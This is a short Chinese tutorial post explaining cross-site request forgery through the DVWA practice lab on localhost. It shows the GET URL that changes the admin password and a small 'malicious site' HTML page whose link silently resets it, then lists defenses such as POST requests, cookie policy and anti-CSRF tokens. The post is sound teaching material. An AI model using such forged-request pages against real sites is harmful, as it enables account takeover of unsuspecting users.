溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
首先什么是CSRF:
如圖:
1,用戶通過瀏覽器正常訪問帶有CSRF漏洞的網站。
如我去訪問http://127.0.0.1:8080/DVWA/login.php
我們登錄進去賬號是:admin 密碼是:password,找到一個修改密碼的地方
修改密碼為123456,修改的url是:
http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#
2,我們構造惡意網站B將代碼保存為index.html
<html> <head> <title>這是惡意網頁</title> </head> <body> <h2>這是惡意網頁<h2> <a href="http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">***</a> </body> </html>
我們訪問網站B:點擊***
我們可以看到密碼被改了(改成了password)
防御:
1.盡量使用POST,限制GET
2.瀏覽器Cookie策略
3.Anti CSRF Token
微信公眾號:
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
